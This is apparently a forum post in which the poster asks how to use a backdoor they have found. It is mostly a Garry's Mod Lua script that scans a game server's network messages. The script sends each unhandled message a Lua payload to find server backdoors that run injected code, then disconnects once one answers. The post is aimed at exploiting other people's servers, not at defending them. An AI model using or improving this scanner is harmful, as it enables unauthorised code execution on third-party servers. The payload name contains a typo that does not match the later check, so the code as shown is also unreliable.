How do use use the backdoor name
I don't know what I do with the name of the backdoor.
local cooldown = 1.1
local messagesStarted = false
local function ValidNetString(str)
return isstring(str) and util.NetworkStringToID(str) != 0 and str != ""
end
local timerCount = 0
for count = 0, 65536 do
local currentNetMSg = util.NetworkIDToString(count)
print(currentNetMSg)
if messagesStarted and not currentNetMSg then
print("Finished")
break
end
if currentNetMSg and currentNetMSg != "" then
messagesStarted = true
if not net.Receivers[currentNetMSg] then
if ValidNetString(currentNetMSg) then
timerCount = timerCount + cooldown
print(timerCount)
timer.Simple(timerCount, function()
print("Sent net message: "..currentNetMSg)
net.Start(currentNetMSg)
net.WriteString('util.AddNetworkString("foundwhatw elookinfor")')
net.WriteBit(1)
net.SendToServer()
if ValidNetString("foundwhatwelookinfor") then
print("Found backdoor: "..currentNetMSg)
RunConsoleCommand("disconnect")
else
print("Not backdoor")
end
print("---------------------------------------------")
end)
end
end
end
end